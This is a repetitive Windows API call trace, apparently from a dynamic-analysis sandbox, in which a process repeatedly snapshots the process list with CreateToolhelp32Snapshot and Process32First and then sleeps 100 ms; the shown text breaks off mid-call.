[0168.440] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.501] Sleep (dwMilliseconds=0x64) [0168.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.517] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.571] Sleep (dwMilliseconds=0x64) [0168.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.594] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.645] Sleep (dwMilliseconds=0x64) [0168.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.672] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.729] Sleep (dwMilliseconds=0x64) [0168.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.750] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.810] Sleep (dwMilliseconds=0x64) [0168.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.829] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.982] Sleep (dwMilliseconds=0x64) [0168.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.007] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.072] Sleep (dwMilliseconds=0x64) [0169.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.095] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.155] Sleep (dwMilliseconds=0x64) [0169.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.213] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.271] Sleep (dwMilliseconds=0x64) [0169.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.300] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.377] Sleep (dwMilliseconds=0x64) [0169.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.391] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.437] Sleep (dwMilliseconds=0x64) [0169.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.451] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.505] Sleep (dwMilliseconds=0x64) [0169.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.531] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.579] Sleep (dwMilliseconds=0x64) [0169.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.591] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.641] Sleep (dwMilliseconds=0x64) [0169.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.654] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.699] Sleep (dwMilliseconds=0x64) [0169.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.717] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.761] Sleep (dwMilliseconds=0x64) [0169.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.780] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.837] Sleep (dwMilliseconds=0x64) [0169.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.860] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.932] Sleep (dwMilliseconds=0x64) [0169.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0169.951] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.007] Sleep (dwMilliseconds=0x64) [0170.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.029] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.078] Sleep (dwMilliseconds=0x64) [0170.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.092] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.143] Sleep (dwMilliseconds=0x64) [0170.144] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.152] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.219] Sleep (dwMilliseconds=0x64) [0170.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.234] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.278] Sleep (dwMilliseconds=0x64) [0170.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.293] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.336] Sleep (dwMilliseconds=0x64) [0170.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.356] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.409] Sleep (dwMilliseconds=0x64) [0170.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.435] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.479] Sleep (dwMilliseconds=0x64) [0170.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.496] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.540] Sleep (dwMilliseconds=0x64) [0170.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.560] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.605] Sleep (dwMilliseconds=0x64) [0170.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.621] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.676] Sleep (dwMilliseconds=0x64) [0170.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.702] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.746] Sleep (dwMilliseconds=0x64) [0170.754] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.762] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.811] Sleep (dwMilliseconds=0x64) [0170.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.828] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.872] Sleep (dwMilliseconds=0x64) [0170.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.888] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.932] Sleep (dwMilliseconds=0x64) [0170.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0170.949] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.998] Sleep (dwMilliseconds=0x64) [0171.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.015] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.060] Sleep (dwMilliseconds=0x64) [0171.066] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.074] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.115] Sleep (dwMilliseconds=0x64) [0171.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.137] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.198] Sleep (dwMilliseconds=0x64) [0171.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.216] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.262] Sleep (dwMilliseconds=0x64) [0171.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.278] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.380] Sleep (dwMilliseconds=0x64) [0171.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.406] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.451] Sleep (dwMilliseconds=0x64) [0171.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.466] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.511] Sleep (dwMilliseconds=0x64) [0171.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.528] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.574] Sleep (dwMilliseconds=0x64) [0171.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.591] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.633] Sleep (dwMilliseconds=0x64) [0171.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.653] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.695] Sleep (dwMilliseconds=0x64) [0171.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.718] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.761] Sleep (dwMilliseconds=0x64) [0171.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.777] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.828] Sleep (dwMilliseconds=0x64) [0171.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.842] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.894] Sleep (dwMilliseconds=0x64) [0171.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0171.922] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.974] Sleep (dwMilliseconds=0x64) [0171.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.000] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.080] Sleep (dwMilliseconds=0x64) [0172.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.094] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.152] Sleep (dwMilliseconds=0x64) [0172.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.217] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.273] Sleep (dwMilliseconds=0x64) [0172.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.295] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.358] Sleep (dwMilliseconds=0x64) [0172.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.375] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.434] Sleep (dwMilliseconds=0x64) [0172.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.453] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.506] Sleep (dwMilliseconds=0x64) [0172.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.530] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.589] Sleep (dwMilliseconds=0x64) [0172.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.613] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.682] Sleep (dwMilliseconds=0x64) [0172.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.705] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.767] Sleep (dwMilliseconds=0x64) [0172.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.781] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.854] Sleep (dwMilliseconds=0x64) [0172.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.875] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.938] Sleep (dwMilliseconds=0x64) [0172.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0172.954] Process32First (in: 